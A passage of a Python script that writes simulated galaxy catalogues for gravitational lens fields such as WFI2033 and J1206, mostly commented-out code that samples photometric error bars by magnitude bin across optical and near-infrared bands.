%.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\nif lens == \"0408\": np.savetxt(fileout,np.c_[dataout[id_o],dataout[zspec_o],dataout[posx_o],dataout[posy_o],dataout[g_o],dataout[gerr_o],dataout[r_o],dataout[rerr_o],dataout[i_o],dataout[ierr_o],dataout[z_o],dataout[zerr_o]],header=head,fmt='%d \\t %.3f \\t %.7f \\t %.7f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\n\n#dataout = np.zeros([15,np.shape(data)[1]])\n\n# name dataout labels\n# o stands for out\n#id_o = 0\n#zspec_o = 1\n#posx_o = 2\n#posy_o = 3\n#mhalo_o = 4\n#mstar_o = 5\n#iorig_o = 6\n#g_o = 7\n#gerr_o = 8\n#r_o = 9\n#rerr_o = 10\n#i_o = 11\n#ierr_o = 12\n#K_o = 13\n#Kerr_o = 14\n\n#dataout[id_o] = np.copy(data[id])\n#dataout[zspec_o] = np.copy(data[zspec])\n#dataout[posx_o] = np.copy(data[posx])\n#dataout[posy_o] = np.copy(data[posy])\n#dataout[mhalo_o] = np.copy(data[mhalo])\n#dataout[mstar_o] = np.copy(data[mstar])\n#dataout[iorig_o] = np.copy(data[i])\n#dataout[g_o] = np.copy(data[g])\n#dataout[r_o] = np.copy(data[r])\n#dataout[i_o] = np.copy(data[i])\n#dataout[K_o] = np.copy(data[K])\n\n''' Sampling the photometry by assuming error bars from the observations. 
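# --- Aside (hedged note on the commented detection-limit block above): the '+1.75' added to each limiting magnitude is consistent with converting a 5-sigma depth into a 1-sigma one, since 2.5*np.log10(5) = 1.747, i.e. schematically:\n#   limit_1sigma = limit_5sigma + 2.5 * np.log10(5)\n# --- end aside; the triple quote below closes the sampling note above.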
'''\n# ugriJHK\n# WFI2033\n#dataout[uerr_o][data[u]<20] = positive(np.random.normal(0.01, 0.006, len(data[u][data[u]<20])))\n#dataout[uerr_o][(data[u]>=20) & (data[u]<20.5)] = positive(np.random.normal(0.02, 0.009, len(data[u][(data[u]>=20) & (data[u]<20.5)])))\n#dataout[uerr_o][(data[u]>=20.5) & (data[u]<21)] = positive(np.random.normal(0.03, 0.008, len(data[u][(data[u]>=20.5) & (data[u]<21)])))\n#dataout[uerr_o][(data[u]>=21) & (data[u]<21.5)] = positive(np.random.normal(0.04, 0.013, len(data[u][(data[u]>=21) & (data[u]<21.5)])))\n#dataout[uerr_o][(data[u]>=21.5) & (data[u]<22)] = positive(np.random.normal(0.06, 0.015, len(data[u][(data[u]>=21.5) & (data[u]<22)])))\n#dataout[uerr_o][(data[u]>=22) & (data[u]<22.5)] = positive(np.random.normal(0.07, 0.016, len(data[u][(data[u]>=22) & (data[u]<22.5)])))\n#dataout[uerr_o][(data[u]>=22.5) & (data[u]<22.75)] = positive(np.random.normal(0.09, 0.014, len(data[u][(data[u]>=22.5) & (data[u]<22.75)])))\n#dataout[uerr_o][(data[u]>=22.75) & (data[u]<23)] = positive(np.random.normal(0.11, 0.022, len(data[u][(data[u]>=22.75) & (data[u]<23)])))\n#dataout[uerr_o][(data[u]>=23) & (data[u]<23.25)] = positive(np.random.normal(0.12, 0.013, len(data[u][(data[u]>=23) & (data[u]<23.25)])))\n#dataout[uerr_o][(data[u]>=23.25) & (data[u]<23.5)] = positive(np.random.normal(0.14, 0.018, len(data[u][(data[u]>=23.25) & (data[u]<23.5)])))\n#dataout[uerr_o][(data[u]>=23.5) & (data[u]<23.75)] = positive(np.random.normal(0.16, 0.034, len(data[u][(data[u]>=23.5) & (data[u]<23.75)])))\n#dataout[uerr_o][(data[u]>=23.75) & (data[u]<24)] = positive(np.random.normal(0.17, 0.029, len(data[u][(data[u]>=23.75) & (data[u]<24)])))\n#dataout[uerr_o][(data[u]>=24) & (data[u]<24.25)] = positive(np.random.normal(0.17, 0.017, len(data[u][(data[u]>=24) & (data[u]<24.25)])))\n#dataout[uerr_o][(data[u]>=24.25) & (data[u]<24.5)] = positive(np.random.normal(0.19, 0.026, len(data[u][(data[u]>=24.25) & (data[u]<24.5)])))\n#dataout[uerr_o][(data[u]>=24.5) & (data[u]<24.75)] = positive(np.random.normal(0.20, 0.046, len(data[u][(data[u]>=24.5) & (data[u]<24.75)])))\n#dataout[uerr_o][(data[u]>=24.75) & (data[u]<25)] = positive(np.random.normal(0.26, 0.038, len(data[u][(data[u]>=24.75) & (data[u]<25)])))\n#dataout[uerr_o][(data[u]>=25) & (data[u]<25.25)] = positive(np.random.normal(0.32, 0.032, len(data[u][(data[u]>=25) & (data[u]<25.25)])))\n#dataout[uerr_o][data[u]>=25.25] = positive(np.random.normal(0.36, 0.039, len(data[u][data[u]>=25.25])))\n# WFI2033\n#dataout[gerr_o][data[g]<20] = positive(np.random.normal(0.005,0.004, len(data[g][data[g]<20])))\n#dataout[gerr_o][(data[g]>=20) & (data[g]<21)] = positive(np.random.normal(0.01, 0.002, len(data[g][(data[g]>=20) & (data[g]<21)])))\n#dataout[gerr_o][(data[g]>=21) & (data[g]<21.5)] = positive(np.random.normal(0.02, 0.011, len(data[g][(data[g]>=21) & (data[g]<21.5)])))\n#dataout[gerr_o][(data[g]>=21.5) & (data[g]<22)] = positive(np.random.normal(0.03, 0.007, len(data[g][(data[g]>=21.5) & (data[g]<22)])))\n#dataout[gerr_o][(data[g]>=22) & (data[g]<22.5)] = positive(np.random.normal(0.04, 0.010, len(data[g][(data[g]>=22) & (data[g]<22.5)])))\n#dataout[gerr_o][(data[g]>=22.5) & (data[g]<22.75)] = positive(np.random.normal(0.05, 0.007, len(data[g][(data[g]>=22.5) & (data[g]<22.75)])))\n#dataout[gerr_o][(data[g]>=22.75) & (data[g]<23)] = positive(np.random.normal(0.07, 0.013, len(data[g][(data[g]>=22.75) & (data[g]<23)])))\n#dataout[gerr_o][(data[g]>=23) & (data[g]<23.25)] = positive(np.random.normal(0.08, 0.019, len(data[g][(data[g]>=23) & 
(data[g]<23.25)])))\n#dataout[gerr_o][(data[g]>=23.25) & (data[g]<23.5)] = positive(np.random.normal(0.09, 0.024, len(data[g][(data[g]>=23.25) & (data[g]<23.5)])))\n#dataout[gerr_o][(data[g]>=23.5) & (data[g]<23.75)] = positive(np.random.normal(0.12, 0.032, len(data[g][(data[g]>=23.5) & (data[g]<23.75)])))\n#dataout[gerr_o][(data[g]>=23.75) & (data[g]<24)] = positive(np.random.normal(0.14, 0.026, len(data[g][(data[g]>=23.75) & (data[g]<24)])))\n#dataout[gerr_o][(data[g]>=24) & (data[g]<24.25)] = positive(np.random.normal(0.18, 0.040, len(data[g][(data[g]>=24) & (data[g]<24.25)])))\n#dataout[gerr_o][(data[g]>=24.25) & (data[g]<24.5)] = positive(np.random.normal(0.22, 0.056, len(data[g][(data[g]>=24.25) & (data[g]<24.5)])))\n#dataout[gerr_o][(data[g]>=24.5) & (data[g]<24.75)] = positive(np.random.normal(0.25, 0.053, len(data[g][(data[g]>=24.5) & (data[g]<24.75)])))\n#dataout[gerr_o][data[g]>=24.75] = positive(np.random.normal(0.29, 0.062, len(data[g][data[g]>=24.75])))\n\n# J1206\n#zpterr = 0.025\n#zpterr = 0.00\n#dataout[gerr_o][data[g]<20] = positive(np.random.normal(np.sqrt(0.005**2+zpterr**2),0.005, len(data[g][data[g]<20])))\n#dataout[gerr_o][(data[g]>=20) & (data[g]<21)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.004, len(data[g][(data[g]>=20) & (data[g]<21)])))\n#dataout[gerr_o][(data[g]>=21) & (data[g]<22)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.004, len(data[g][(data[g]>=21) & (data[g]<22)])))\n#dataout[gerr_o][(data[g]>=22) & (data[g]<22.5)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.004, len(data[g][(data[g]>=22) & (data[g]<22.5)])))\n#dataout[gerr_o][(data[g]>=22.5) & (data[g]<22.75)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.008, len(data[g][(data[g]>=22.5) & (data[g]<22.75)])))\n#dataout[gerr_o][(data[g]>=22.75) & (data[g]<23)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.007, len(data[g][(data[g]>=22.75) & (data[g]<23)])))\n#dataout[gerr_o][(data[g]>=23) & (data[g]<23.25)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.006, len(data[g][(data[g]>=23) & (data[g]<23.25)])))\n#dataout[gerr_o][(data[g]>=23.25) & (data[g]<23.5)] = positive(np.random.normal(np.sqrt(0.03**2+zpterr**2), 0.006, len(data[g][(data[g]>=23.25) & (data[g]<23.5)])))\n#dataout[gerr_o][(data[g]>=23.5) & (data[g]<23.75)] = positive(np.random.normal(np.sqrt(0.04**2+zpterr**2), 0.008, len(data[g][(data[g]>=23.5) & (data[g]<23.75)])))\n#dataout[gerr_o][(data[g]>=23.75) & (data[g]<24)] = positive(np.random.normal(np.sqrt(0.03**2+zpterr**2), 0.011, len(data[g][(data[g]>=23.75) & (data[g]<24)])))\n#dataout[gerr_o][(data[g]>=24) & (data[g]<24.25)] = positive(np.random.normal(np.sqrt(0.05**2+zpterr**2), 0.010, len(data[g][(data[g]>=24) & (data[g]<24.25)])))\n#dataout[gerr_o][(data[g]>=24.25) & (data[g]<24.5)] = positive(np.random.normal(np.sqrt(0.06**2+zpterr**2), 0.011, len(data[g][(data[g]>=24.25) & (data[g]<24.5)])))\n#dataout[gerr_o][(data[g]>=24.5) & (data[g]<24.75)] = positive(np.random.normal(np.sqrt(0.06**2+zpterr**2), 0.016, len(data[g][(data[g]>=24.5) & (data[g]<24.75)])))\n#dataout[gerr_o][(data[g]>=24.75) & (data[g]<25)] = positive(np.random.normal(np.sqrt(0.08**2+zpterr**2), 0.014, len(data[g][(data[g]>=24.75) & (data[g]<25)])))\n#dataout[gerr_o][(data[g]>=25) & (data[g]<25.25)] = positive(np.random.normal(np.sqrt(0.09**2+zpterr**2), 0.019, len(data[g][(data[g]>=25) & (data[g]<25.25)])))\n#dataout[gerr_o][(data[g]>=25.25) & (data[g]<25.5)] = positive(np.random.normal(np.sqrt(0.09**2+zpterr**2), 0.022, 
len(data[g][(data[g]>=25.25) & (data[g]<25.5)])))\n#dataout[gerr_o][(data[g]>=25.5) & (data[g]<26)] = positive(np.random.normal(np.sqrt(0.11**2+zpterr**2), 0.025, len(data[g][(data[g]>=25.5) & (data[g]<26)])))\n#dataout[gerr_o][data[g]>=24.75] = positive(np.random.normal(np.sqrt(0.19**2+zpterr**2), 0.020, len(data[g][data[g]>=24.75])))\n\n# WFI2033\n#dataout[rerr_o][data[r]<20] = positive(np.random.normal(0.005,0.007, len(data[r][data[r]<20])))\n#dataout[rerr_o][(data[r]>=20) & (data[r]<20.5)] = positive(np.random.normal(0.01, 0.008, len(data[r][(data[r]>=20) & (data[r]<20.5)])))\n#dataout[rerr_o][(data[r]>=20.5) & (data[r]<21)] = positive(np.random.normal(0.02, 0.008, len(data[r][(data[r]>=20.5) & (data[r]<21)])))\n#dataout[rerr_o][(data[r]>=21) & (data[r]<21.5)] = positive(np.random.normal(0.03, 0.007, len(data[r][(data[r]>=21) & (data[r]<21.5)])))\n#dataout[rerr_o][(data[r]>=21.5) & (data[r]<22)] = positive(np.random.normal(0.03, 0.009, len(data[r][(data[r]>=21.5) & (data[r]<22)])))\n#dataout[rerr_o][(data[r]>=22) & (data[r]<22.5)] = positive(np.random.normal(0.05, 0.016, len(data[r][(data[r]>=22) & (data[r]<22.5)])))\n#dataout[rerr_o][(data[r]>=22.5) & (data[r]<22.75)] = positive(np.random.normal(0.06, 0.009, len(data[r][(data[r]>=22.5) & (data[r]<22.75)])))\n#dataout[rerr_o][(data[r]>=22.75) & (data[r]<23)] = positive(np.random.normal(0.08, 0.016, len(data[r][(data[r]>=22.75) & (data[r]<23)])))\n#dataout[rerr_o][(data[r]>=23) & (data[r]<23.25)] = positive(np.random.normal(0.08, 0.019, len(data[r][(data[r]>=23) & (data[r]<23.25)])))\n#dataout[rerr_o][(data[r]>=23.25) & (data[r]<23.5)] = positive(np.random.normal(0.10, 0.018, len(data[r][(data[r]>=23.25) & (data[r]<23.5)])))\n#dataout[rerr_o][(data[r]>=23.5) & (data[r]<23.75)] = positive(np.random.normal(0.11, 0.018, len(data[r][(data[r]>=23.5) & (data[r]<23.75)])))\n#dataout[rerr_o][(data[r]>=23.75) & (data[r]<24)] = positive(np.random.normal(0.14, 0.021, len(data[r][(data[r]>=23.75) & (data[r]<24)])))\n#dataout[rerr_o][(data[r]>=24) & (data[r]<24.25)] = positive(np.random.normal(0.15, 0.020, len(data[r][(data[r]>=24) & (data[r]<24.25)])))\n#dataout[rerr_o][data[r]>=24.25] = positive(np.random.normal(0.16, 0.026, len(data[r][data[r]>=24.25])))\n\n# J1206\n#zpterr = 0.025\n#zpterr = 0.00\n#dataout[rerr_o][data[r]<20] = positive(np.random.normal(np.sqrt(0.005**2+zpterr**2),0.005, len(data[r][data[r]<20])))\n#dataout[rerr_o][(data[r]>=20) & (data[r]<21)] = positive(np.random.normal(np.sqrt(0.005**2+zpterr**2),0.005, len(data[r][(data[r]>=20) & (data[r]<21)])))\n#dataout[rerr_o][(data[r]>=21) & (data[r]<21.5)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.003, len(data[r][(data[r]>=21) & (data[r]<21.5)])))\n#dataout[rerr_o][(data[r]>=21.5) & (data[r]<22)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.004, len(data[r][(data[r]>=21.5) & (data[r]<22)])))\n#dataout[rerr_o][(data[r]>=22) & (data[r]<22.5)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.008, len(data[r][(data[r]>=22) & (data[r]<22.5)])))\n#dataout[rerr_o][(data[r]>=22.5) & (data[r]<22.75)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.005, len(data[r][(data[r]>=22.5) & (data[r]<22.75)])))\n#dataout[rerr_o][(data[r]>=22.75) & (data[r]<23)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.006, len(data[r][(data[r]>=22.75) & (data[r]<23)])))\n#dataout[rerr_o][(data[r]>=23) & (data[r]<23.25)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.007, len(data[r][(data[r]>=23) & 
(data[r]<23.25)])))\n#dataout[rerr_o][(data[r]>=23.25) & (data[r]<23.5)] = positive(np.random.normal(np.sqrt(0.03**2+zpterr**2), 0.008, len(data[r][(data[r]>=23.25) & (data[r]<23.5)])))\n#dataout[rerr_o][(data[r]>=23.5) & (data[r]<23.75)] = positive(np.random.normal(np.sqrt(0.03**2+zpterr**2), 0.010, len(data[r][(data[r]>=23.5) & (data[r]<23.75)])))\n#dataout[rerr_o][(data[r]>=23.75) & (data[r]<24)] = positive(np.random.normal(np.sqrt(0.04**2+zpterr**2), 0.013, len(data[r][(data[r]>=23.75) & (data[r]<24)])))\n#dataout[rerr_o][(data[r]>=24) & (data[r]<24.25)] = positive(np.random.normal(np.sqrt(0.04**2+zpterr**2), 0.011, len(data[r][(data[r]>=24) & (data[r]<24.25)])))\n#dataout[rerr_o][(data[r]>=24.25) & (data[r]<24.5)] = positive(np.random.normal(np.sqrt(0.05**2+zpterr**2), 0.017, len(data[r][(data[r]>=24.25) & (data[r]<24.5)])))\n#dataout[rerr_o][(data[r]>=24.5) & (data[r]<24.75)] = positive(np.random.normal(np.sqrt(0.06**2+zpterr**2), 0.020, len(data[r][(data[r]>=24.5) & (data[r]<24.75)])))\n#dataout[rerr_o][(data[r]>=24.75) & (data[r]<25)] = positive(np.random.normal(np.sqrt(0.08**2+zpterr**2), 0.024, len(data[r][(data[r]>=24.75) & (data[r]<25)])))\n#dataout[rerr_o][data[r]>=25] = positive(np.random.normal(np.sqrt(0.10**2+zpterr**2), 0.027, len(data[r][data[r]>=25])))\n\n# WFI2033\n#dataout[ierr_o][data[i]<19] = positive(np.random.normal(0.005,0.002, len(data[i][data[i]<19])))\n#dataout[ierr_o][(data[i]>=19) & (data[i]<20)] = positive(np.random.normal(0.01, 0.005, len(data[i][(data[i]>=19) & (data[i]<20)])))\n#dataout[ierr_o][(data[i]>=20) & (data[i]<20.5)] = positive(np.random.normal(0.02, 0.005, len(data[i][(data[i]>=20) & (data[i]<20.5)])))\n#dataout[ierr_o][(data[i]>=20.5) & (data[i]<21)] = positive(np.random.normal(0.03, 0.011, len(data[i][(data[i]>=20.5) & (data[i]<21)])))\n#dataout[ierr_o][(data[i]>=21) & (data[i]<21.5)] = positive(np.random.normal(0.04, 0.015, len(data[i][(data[i]>=21) & (data[i]<21.5)])))\n#dataout[ierr_o][(data[i]>=21.5) & (data[i]<22)] = positive(np.random.normal(0.07, 0.019, len(data[i][(data[i]>=21.5) & (data[i]<22)])))\n#dataout[ierr_o][(data[i]>=22) & (data[i]<22.5)] = positive(np.random.normal(0.10, 0.023, len(data[i][(data[i]>=22) & (data[i]<22.5)])))\n#dataout[ierr_o][(data[i]>=22.5) & (data[i]<22.75)] = positive(np.random.normal(0.13, 0.034, len(data[i][(data[i]>=22.5) & (data[i]<22.75)])))\n#dataout[ierr_o][(data[i]>=22.75) & (data[i]<23)] = positive(np.random.normal(0.15, 0.038, len(data[i][(data[i]>=22.75) & (data[i]<23)])))\n#dataout[ierr_o][(data[i]>=23) & (data[i]<23.25)] = positive(np.random.normal(0.19, 0.039, len(data[i][(data[i]>=23) & (data[i]<23.25)])))\n#dataout[ierr_o][data[i]>=23.25] = positive(np.random.normal(0.23, 0.031, len(data[i][data[i]>=23.25])))\n\n# J1206\n#zpterr = 0.025\n#zpterr = 0.00\n#dataout[ierr_o][data[i]<20] = positive(np.random.normal(np.sqrt(0.005**2+zpterr**2),0.005, len(data[i][data[i]<20])))\n#dataout[ierr_o][(data[i]>=20) & (data[i]<21)] = positive(np.random.normal(np.sqrt(0.005**2+zpterr**2),0.005, len(data[i][(data[i]>=20) & (data[i]<21)])))\n#dataout[ierr_o][(data[i]>=21) & (data[i]<22)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.003, len(data[i][(data[i]>=21) & (data[i]<22)])))\n#dataout[ierr_o][(data[i]>=22) & (data[i]<22.5)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.006, len(data[i][(data[i]>=22) & (data[i]<22.5)])))\n#dataout[ierr_o][(data[i]>=22.5) & (data[i]<22.75)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.007, len(data[i][(data[i]>=22.5) & 
(data[i]<22.75)])))\n#dataout[ierr_o][(data[i]>=22.75) & (data[i]<23)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.008, len(data[i][(data[i]>=22.75) & (data[i]<23)])))\n#dataout[ierr_o][(data[i]>=23) & (data[i]<23.25)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.005, len(data[i][(data[i]>=23) & (data[i]<23.25)])))\n#dataout[ierr_o][(data[i]>=23.25) & (data[i]<23.5)] = positive(np.random.normal(np.sqrt(0.03**2+zpterr**2), 0.007, len(data[i][(data[i]>=23.25) & (data[i]<23.5)])))\n#dataout[ierr_o][(data[i]>=23.5) & (data[i]<23.75)] = positive(np.random.normal(np.sqrt(0.03**2+zpterr**2), 0.014, len(data[i][(data[i]>=23.5) & (data[i]<23.75)])))\n#dataout[ierr_o][data[i]>=23.25] = positive(np.random.normal(np.sqrt(0.04**2+zpterr**2), 0.015, len(data[i][data[i]>=23.25])))\n\n# WFI2033\n#dataout[zerr_o][data[z]<18] = positive(np.random.normal(0.005,0.005, len(data[z][data[z]<18])))\n#dataout[zerr_o][(data[z]>=18) & (data[z]<19)] = positive(np.random.normal(0.01, 0.009, len(data[z][(data[z]>=18) & (data[z]<19)])))\n#dataout[zerr_o][(data[z]>=19) & (data[z]<20)] = positive(np.random.normal(0.02, 0.008, len(data[z][(data[z]>=19) & (data[z]<20)])))\n#dataout[zerr_o][(data[z]>=20) & (data[z]<20.5)] = positive(np.random.normal(0.04, 0.015, len(data[z][(data[z]>=20) & (data[z]<20.5)])))\n#dataout[zerr_o][(data[z]>=20.5) & (data[z]<21)] = positive(np.random.normal(0.06, 0.014, len(data[z][(data[z]>=20.5) & (data[z]<21)])))\n#dataout[zerr_o][(data[z]>=21) & (data[z]<21.5)] = positive(np.random.normal(0.07, 0.017, len(data[z][(data[z]>=21) & (data[z]<21.5)])))\n#dataout[zerr_o][(data[z]>=21.5) & (data[z]<22)] = positive(np.random.normal(0.10, 0.027, len(data[z][(data[z]>=21.5) & (data[z]<22)])))\n#dataout[zerr_o][(data[z]>=22) & (data[z]<22.5)] = positive(np.random.normal(0.14, 0.027, len(data[z][(data[z]>=22) & (data[z]<22.5)])))\n#dataout[zerr_o][(data[z]>=22.5) & (data[z]<22.75)] = positive(np.random.normal(0.17, 0.035, len(data[z][(data[z]>=22.5) & (data[z]<22.75)])))\n#dataout[zerr_o][(data[z]>=22.75) & (data[z]<23)] = positive(np.random.normal(0.18, 0.034, len(data[z][(data[z]>=22.75) & (data[z]<23)])))\n#dataout[zerr_o][(data[z]>=23) & (data[z]<23.25)] = positive(np.random.normal(0.21, 0.037, len(data[z][(data[z]>=23) & (data[z]<23.25)])))\n#dataout[zerr_o][data[z]>=23.25] = positive(np.random.normal(0.30, 0.082, len(data[z][data[z]>=23.25])))\n\n# WFI2033\n#dataout[Jerr_o][data[J]<16] = positive(np.random.normal(np.sqrt(0.005**2+0.04**2),0.004, len(data[J][data[J]<16])))\n#dataout[Jerr_o][(data[J]>=16) & (data[J]<17)] = positive(np.random.normal(np.sqrt(0.01**2+0.04**2), 0.006, len(data[J][(data[J]>=16) & (data[J]<17)])))\n#dataout[Jerr_o][(data[J]>=17) & (data[J]<18)] = positive(np.random.normal(np.sqrt(0.02**2+0.04**2), 0.014, len(data[J][(data[J]>=17) & (data[J]<18)])))\n#dataout[Jerr_o][(data[J]>=18) & (data[J]<18.5)] = positive(np.random.normal(np.sqrt(0.03**2+0.04**2), 0.009, len(data[J][(data[J]>=18) & (data[J]<18.5)])))\n#dataout[Jerr_o][(data[J]>=18.5) & (data[J]<19)] = positive(np.random.normal(np.sqrt(0.04**2+0.04**2), 0.010, len(data[J][(data[J]>=18.5) & (data[J]<19)])))\n#dataout[Jerr_o][(data[J]>=19) & (data[J]<19.5)] = positive(np.random.normal(np.sqrt(0.06**2+0.04**2), 0.020, len(data[J][(data[J]>=19) & (data[J]<19.5)])))\n#dataout[Jerr_o][(data[J]>=19.5) & (data[J]<20)] = positive(np.random.normal(np.sqrt(0.07**2+0.04**2), 0.022, len(data[J][(data[J]>=19.5) & (data[J]<20)])))\n#dataout[Jerr_o][(data[J]>=20) & (data[J]<20.5)] = 
positive(np.random.normal(np.sqrt(0.10**2+0.04**2), 0.031, len(data[J][(data[J]>=20) & (data[J]<20.5)])))\n#dataout[Jerr_o][(data[J]>=20.5) & (data[J]<20.75)] = positive(np.random.normal(np.sqrt(0.11**2+0.04**2), 0.037, len(data[J][(data[J]>=20.5) & (data[J]<20.75)])))\n#dataout[Jerr_o][(data[J]>=20.75) & (data[J]<21)] = positive(np.random.normal(np.sqrt(0.15**2+0.04**2), 0.028, len(data[J][(data[J]>=20.75) & (data[J]<21)])))\n#dataout[Jerr_o][(data[J]>=21) & (data[J]<21.25)] = positive(np.random.normal(np.sqrt(0.16**2+0.04**2), 0.035, len(data[J][(data[J]>=21) & (data[J]<21.25)])))\n#dataout[Jerr_o][(data[J]>=21.25) & (data[J]<21.5)] = positive(np.random.normal(np.sqrt(0.18**2+0.04**2), 0.028, len(data[J][(data[J]>=21.25) & (data[J]<21.5)])))\n#dataout[Jerr_o][data[J]>=21.5] = positive(np.random.normal(np.sqrt(0.19**2+0.04**2), 0.029, len(data[J][data[J]>=21.5])))\n\n# WFI2033\n#dataout[Herr_o][data[H]<15] = positive(np.random.normal(np.sqrt(0.005**2+0.04**2),0.003, len(data[H][data[H]<15])))\n#dataout[Herr_o][(data[H]>=15) & (data[H]<16)] = positive(np.random.normal(np.sqrt(0.01**2+0.04**2), 0.003, len(data[H][(data[H]>=15) & (data[H]<16)])))\n#dataout[Herr_o][(data[H]>=16) & (data[H]<17)] = positive(np.random.normal(np.sqrt(0.02**2+0.04**2), 0.013, len(data[H][(data[H]>=16) & (data[H]<17)])))\n#dataout[Herr_o][(data[H]>=17) & (data[H]<17.5)] = positive(np.random.normal(np.sqrt(0.03**2+0.04**2), 0.014, len(data[H][(data[H]>=17) & (data[H]<17.5)])))\n#dataout[Herr_o][(data[H]>=17.5) & (data[H]<18)] = positive(np.random.normal(np.sqrt(0.04**2+0.04**2), 0.008, len(data[H][(data[H]>=17.5) & (data[H]<18)])))\n#dataout[Herr_o][(data[H]>=18) & (data[H]<18.5)] = positive(np.random.normal(np.sqrt(0.06**2+0.04**2), 0.015, len(data[H][(data[H]>=18) & (data[H]<18.5)])))\n#dataout[Herr_o][(data[H]>=18.5) & (data[H]<19)] = positive(np.random.normal(np.sqrt(0.07**2+0.04**2), 0.025, len(data[H][(data[H]>=18.5) & (data[H]<19)])))\n#dataout[Herr_o][(data[H]>=19) & (data[H]<19.5)] = positive(np.random.normal(np.sqrt(0.09**2+0.04**2), 0.021, len(data[H][(data[H]>=19) & (data[H]<19.5)])))\n#dataout[Herr_o][(data[H]>=19.5) & (data[H]<19.75)] = positive(np.random.normal(np.sqrt(0.13**2+0.04**2), 0.048, len(data[H][(data[H]>=19.5) & (data[H]<19.75)])))\n#dataout[Herr_o][(data[H]>=19.75) & (data[H]<20)] = positive(np.random.normal(np.sqrt(0.12**2+0.04**2), 0.034, len(data[H][(data[H]>=19.75) & (data[H]<20)])))\n#dataout[Herr_o][(data[H]>=20) & (data[H]<20.25)] = positive(np.random.normal(np.sqrt(0.17**2+0.04**2), 0.038, len(data[H][(data[H]>=20) & (data[H]<20.25)])))\n#dataout[Herr_o][(data[H]>=20.25) & (data[H]<20.5)] = positive(np.random.normal(np.sqrt(0.17**2+0.04**2), 0.025, len(data[H][(data[H]>=20.25) & (data[H]<20.5)])))\n#dataout[Herr_o][data[H]>=20.5] = positive(np.random.normal(np.sqrt(0.19**2+0.04**2), 0.029, len(data[H][data[H]>=20.5])))\n\n# WFI2033\n#dataout[Kerr_o][data[K]<15] = positive(np.random.normal(np.sqrt(0.005**2+0.08**2),0.004, len(data[K][data[K]<15])))\n#dataout[Kerr_o][(data[K]>=15) & (data[K]<16)] = positive(np.random.normal(np.sqrt(0.02**2+0.08**2), 0.013, len(data[K][(data[K]>=15) & (data[K]<16)])))\n#dataout[Kerr_o][(data[K]>=16) & (data[K]<17)] = positive(np.random.normal(np.sqrt(0.03**2+0.08**2), 0.007, len(data[K][(data[K]>=16) & (data[K]<17)])))\n#dataout[Kerr_o][(data[K]>=17) & (data[K]<17.5)] = positive(np.random.normal(np.sqrt(0.04**2+0.08**2), 0.016, len(data[K][(data[K]>=17) & (data[K]<17.5)])))\n#dataout[Kerr_o][(data[K]>=17.5) & (data[K]<18)] = 
positive(np.random.normal(np.sqrt(0.06**2+0.08**2), 0.018, len(data[K][(data[K]>=17.5) & (data[K]<18)])))\n#dataout[Kerr_o][(data[K]>=18) & (data[K]<18.5)] = positive(np.random.normal(np.sqrt(0.07**2+0.08**2), 0.014, len(data[K][(data[K]>=18) & (data[K]<18.5)])))\n#dataout[Kerr_o][(data[K]>=18.5) & (data[K]<19)] = positive(np.random.normal(np.sqrt(0.10**2+0.08**2), 0.026, len(data[K][(data[K]>=18.5) & (data[K]<19)])))\n#dataout[Kerr_o][(data[K]>=19) & (data[K]<19.5)] = positive(np.random.normal(np.sqrt(0.14**2+0.08**2), 0.032, len(data[K][(data[K]>=19) & (data[K]<19.5)])))\n#dataout[Kerr_o][(data[K]>=19.5) & (data[K]<19.75)] = positive(np.random.normal(np.sqrt(0.17**2+0.08**2), 0.035, len(data[K][(data[K]>=19.5) & (data[K]<19.75)])))\n#dataout[Kerr_o][(data[K]>=19.75) & (data[K]<20)] = positive(np.random.normal(np.sqrt(0.19**2+0.08**2), 0.070, len(data[K][(data[K]>=19.75) & (data[K]<20)])))\n#dataout[Kerr_o][data[K]>=20] = positive(np.random.normal(np.sqrt(0.19**2+0.08**2), 0.037, len(data[K][data[K]>=20])))\n\n# J1206\n#zpterr = 0.04\n#zpterr = 0.00\n#dataout[Kerr_o][data[K]<18.5] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2),0.005, len(data[K][data[K]<18.5])))\n#dataout[Kerr_o][(data[K]>=18.5) & (data[K]<19.5)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.007, len(data[K][(data[K]>=18.5) & (data[K]<19.5)])))\n#dataout[Kerr_o][(data[K]>=19.5) & (data[K]<20.5)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.006, len(data[K][(data[K]>=19.5) & (data[K]<20.5)])))\n#dataout[Kerr_o][(data[K]>=20.5) & (data[K]<21.5)] = positive(np.random.normal(np.sqrt(0.03**2+zpterr**2), 0.009, len(data[K][(data[K]>=20.5) & (data[K]<21.5)])))\n#dataout[Kerr_o][(data[K]>=21.5) & (data[K]<22)] = positive(np.random.normal(np.sqrt(0.05**2+zpterr**2), 0.011, len(data[K][(data[K]>=21.5) & (data[K]<22)])))\n#dataout[Kerr_o][(data[K]>=22) & (data[K]<22.5)] = positive(np.random.normal(np.sqrt(0.07**2+zpterr**2), 0.016, len(data[K][(data[K]>=22) & (data[K]<22.5)])))\n#dataout[Kerr_o][(data[K]>=22.5) & (data[K]<22.75)] = positive(np.random.normal(np.sqrt(0.09**2+zpterr**2), 0.029, 